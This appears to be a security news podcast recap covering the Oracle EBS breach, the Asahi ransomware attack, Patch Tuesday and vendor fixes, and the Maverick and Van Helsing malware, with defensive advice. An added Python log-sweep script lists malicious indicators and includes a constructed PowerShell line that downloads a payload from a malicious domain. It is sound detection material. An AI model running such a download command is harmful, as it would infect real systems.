Good Morning Security Gang
I’m on the road this morning, so not broadcasting from the usual bunker, and worse — no espresso, just drip coffee. Yeah, I know — tragic.
But even without the double shot, I’m here, fired up and ready, because today’s show is stacked. We’re breaking down fallout from the Oracle E-Business Suite exploit, a major ransomware hit on Asahi Beer in Japan, and all the chaos from Patch Tuesday, including critical fixes from Microsoft, Adobe, SAP, and more.
So grab your coffee, wherever you are — coffee cup cheers, y’all! Let’s get into today’s headlines.
GlobalLogic Confirms Data Theft in Oracle EBS Breach
GlobalLogic, a subsidiary of Hitachi, has notified over 10,000 employees of a data breach linked to the Oracle E-Business Suite zero-day (CVE-2025-61882). This same exploit has fueled attacks across dozens of organizations, as reported yesterday.
The stolen data includes names, Social Security numbers, tax IDs, and bank details, with exfiltration traced back to October 9. That’s not just a data leak — that’s a payroll redirection and identity theft goldmine.
GlobalLogic says the intrusion began in July or August, confirming that attackers had months of undetected access. This continues the ripple effect from the Oracle EBS exploit, which has now become one of the most widespread enterprise breaches of 2025.
If you’re running Oracle EBS, assemble your change management and patching team immediately. The longer this waits, the closer you get to your own headline.
Asahi Beer Ransomware Attack Cripples Production in Japan
Asahi Breweries, one of Japan’s largest beverage producers, remains crippled following a ransomware attack. The Qilin ransomware group has claimed responsibility, leaking data to pressure payment.
The attack disrupted production and distribution, causing ripple effects across retailers and logistics partners. This one’s a textbook OT/ICS attack: downtime equals dollars.
As I said on the show — manufacturing shutdowns are catastrophic because recovery time and ramp-up time aren’t linear. If you lose six weeks of production, it can take six months to recover full capacity.
Mitigation advice for manufacturers:
Isolate OT and ICS networks.
Use data diodes or network obfuscation if integration is unavoidable.
Rehearse paper-based logistics workflows.
And test offline immutable backups regularly.
Ransomware groups love manufacturers for one reason — downtime pays.
Microsoft Patch Tuesday Fixes 60 Flaws, One Actively Exploited Zero-Day
This month’s Patch Tuesday was mercifully lighter than usual — about 60 vulnerabilities, including one actively exploited Windows kernel zero-day (CVE-2025-62215).
The flaw allows local privilege escalation via a race condition, enabling EDR bypass, lateral movement, and potential system-level persistence. Expect exploit kits soon.
My advice: patch immediately, force a reboot window, and hunt for token manipulation or LSASS anomalies. Compared to last month’s chaos of six zero-days, this one feels almost tame — but don’t let that fool you.
Adobe Patches 29 Vulnerabilities Across Creative Suite
Adobe dropped patches for 29 vulnerabilities spanning Photoshop, Illustrator, InDesign, InCopy, and Substance 3D Stager.
Several bugs are critical code execution vulnerabilities, though none have been observed in the wild. Adobe patches are typically straightforward — most environments can test and push updates same-day, except where enterprise integrations require staging.
If you’re running large design or marketing teams, update before end of week. This one’s low-effort, high-reward.
SAP Fixes Critical SQL Vulnerability Rated a Perfect 10
SAP’s November updates include a 10.0 CVSS vulnerability (CVE-2025-42890) — a hardcoded credential issue in SQL Anywhere Monitor — and a 9.9-rated code injection flaw in Solution Manager (CVE-2025-42887).
SAP’s fix? Remove SQL Anywhere Monitor entirely. These are direct code execution risks inside ERP and ITSM systems, meaning attackers can own your business logic layer.
If you’re running SAP:
Apply all November notes.
Remove SQL Anywhere Monitor.
Rotate SAP service credentials.
Review RFC configurations for abuse potential.
This is a high-stakes update cycle — treat it as such.
Ivanti Endpoint Manager Hit by Arbitrary File Write Flaw
Ivanti’s Endpoint Manager has yet another round of vulnerabilities — local privilege escalation and remote code execution flaws impacting supported and legacy branches.
The 2022 branch is end-of-life — if you’re still running it, rip it out. I said it on the show, and I’ll repeat it here: if China loves a tool, it’s time for you to retire it. Ivanti remains a persistent favorite among Chinese APTs because of its deep enterprise reach and weak lifecycle management.
Patch the latest supported builds, and don’t leave this unaddressed.
Firefox 145 Delivers Security and Privacy Hardening
Mozilla released Firefox 145, featuring anti-fingerprinting improvements and enhanced baseline privacy controls.
Organizations should roll out the update through enterprise policies, ensuring consistent security configurations across browsers. A reminder: browsers are often your most exposed attack surface, and every new release helps keep telemetry and tracking under control.
Maverick WhatsApp Malware Hijacking Browser Sessions
The new Maverick malware is spreading across Brazil via WhatsApp Web, hijacking browser sessions to steal credentials and propagate phishing attacks.
The campaign uses .NET-based PowerShell loaders, disables UAC and Defender, and abuses Selenium and ChromeDriver for automation.
It’s targeting Latin American retail and hospitality firms for now — but given WhatsApp’s global use, this could easily go worldwide. If your organization operates outside the U.S., this is a real risk.
Block ChromeDriver, restrict WhatsApp Web on corporate devices, and monitor for PowerShell IOCs (OrcaMento.vps, Tadu.ps1, domains like zapgrand[.]com).
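A small IOC sweep over PowerShell script-block logs, added here as an example and not code from the original post: it refangs the indicators quoted above, matches them with word boundaries (so any subdomain of zapgrand[.]com fires, but an unrelated domain that merely contains the string does not), and runs over constructed log records. The host names and record layout are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Indicators quoted in the write-up; the domain is defanged with [.] so it is
# not clickable and must be refanged before it can match live telemetry.
MAVERICK_IOCS: Dict[str, List[str]] = {
    "file": ["OrcaMento.vps", "Tadu.ps1"],
    "domain": ["zapgrand[.]com"],
}

def refang(text: str) -> str:
    """Turn defanged notation (zapgrand[.]com, hxxps://) back into its live form."""
    return text.replace("[.]", ".").replace("hxxp", "http")

def compile_iocs(iocs: Dict[str, List[str]]) -> List[Tuple[str, str, re.Pattern]]:
    """One case-insensitive regex per indicator. Boundaries stop 'Tadu.ps1' from
    firing inside 'NotTadu.ps1'; domain patterns also catch any subdomain."""
    compiled = []
    for name in iocs["file"]:
        pat = r"(?<![\w-])" + re.escape(name) + r"(?![\w-])"
        compiled.append(("file", name, re.compile(pat, re.IGNORECASE)))
    for name in iocs["domain"]:
        pat = r"(?<![\w.-])(?:[\w-]+\.)*" + re.escape(refang(name)) + r"(?![\w-])"
        compiled.append(("domain", name, re.compile(pat, re.IGNORECASE)))
    return compiled

def scan_script_blocks(events: List[Dict[str, str]],
                       iocs: Dict[str, List[str]] = MAVERICK_IOCS) -> List[Dict[str, str]]:
    """Return one hit per (event, indicator) pair. Event text is refanged as well,
    so samples pasted from a defanged report match exactly like live logs."""
    hits = []
    for kind, name, pattern in compile_iocs(iocs):
        for ev in events:
            if pattern.search(refang(ev["script"])):
                hits.append({"host": ev["host"], "kind": kind, "indicator": name})
    return hits

# Constructed PowerShell Event ID 4104 (ScriptBlock) records, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS-BR-0142",
     "script": r"iwr hxxps://cdn.zapgrand[.]com/t -OutFile $env:TEMP\Tadu.ps1"},
    {"host": "WS-BR-0077",
     "script": r"Start-Process -FilePath C:\ProgramData\OrcaMento.vps -WindowStyle Hidden"},
    {"host": "WS-BR-0201",  # benign near miss: a different registrable domain
     "script": "Invoke-RestMethod https://api.notzapgrand.com/health"},
]

if __name__ == "__main__":
    for hit in scan_script_blocks(SAMPLE_EVENTS):
        print(f"{hit['host']}: {hit['kind']} indicator {hit['indicator']}")
```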
Van Helsing: A New Ransomware-as-a-Service Operation Emerges
A new ransomware family dubbed Van Helsing is gaining traction on dark web forums. It targets Windows, Linux, macOS, BSD, ARM, and ESXi, offering affiliates 80% profit shares and requiring a $5,000 buy-in.
Its encryption uses ChaCha20 and Curve25519, and its lateral movement capabilities make it particularly dangerous in hybrid environments.
To defend against it:
Deploy EDR on hypervisors.
Sign SMB traffic.
Limit privileged service accounts.
Van Helsing is proof that ransomware is going multi-platform faster than many defenders can adapt.
New York Enforces “Junk Fee” Transparency Law
Starting this week, New York’s junk fee pricing law takes effect, requiring total price transparency at checkout — critical for SaaS and e-commerce.
Noncompliance can lead to fines. If you sell in New York:
Audit your checkout flows.
Include all taxes and fees upfront.
Update UX copy and legal disclosures.
The Bitcoin Queen Sentenced to 11 Years in Prison
The infamous “Bitcoin Queen,” Zhimin Qian, has been sentenced to 11 years and 8 months in the U.K. after laundering over $5.3 billion in crypto linked to Chinese fraud schemes between 2014 and 2017.
Authorities seized 61,000 Bitcoin, worth more than $7 billion, in one of the largest crypto busts ever.
As I said on the show — she should count herself lucky she was arrested in the U.K. If this trial happened in China, she’d have been executed within 30 days. Justice looks very different depending on which side of the world you’re on.
Action List
🧩 Patch Oracle EBS (CVE-2025-61882) immediately.
🍺 Isolate OT networks and test offline backups if in manufacturing.
🧱 Apply Microsoft and Adobe updates before end of week.
🧑‍💻 Remove SAP SQL Anywhere Monitor and rotate credentials.
🔐 Patch Ivanti and decommission end-of-life versions.
🌐 Update Firefox 145 across enterprise environments.
📲 Block WhatsApp Web and Selenium executables.
⚙️ Review ransomware tabletop playbooks — Van Helsing is cross-platform.
💳 Audit pricing transparency for New York compliance.
James Azar’s CISO’s Take
Today’s episode ties together one truth — our environments are too interconnected for lazy patching. From Oracle EBS to Ivanti and SAP, the same pattern keeps showing up: systems built for efficiency becoming the attack vector for exploitation. Add to that ransomware hitting operational technology, and we’re reminded that resilience isn’t just digital — it’s physical.
My takeaway this morning: patching is the easy part; discipline is the hard part. If you can’t manage change fast enough, you’re managing risk instead of reducing it. And in manufacturing or enterprise software, the difference between the two can be millions in lost revenue.
Stay sharp, Security Gang. Keep your backups offline, your browsers patched, and your passwords smarter than “Louvre.”
Until tomorrow — stay caffeinated, stay vigilant, and most importantly — stay cyber safe.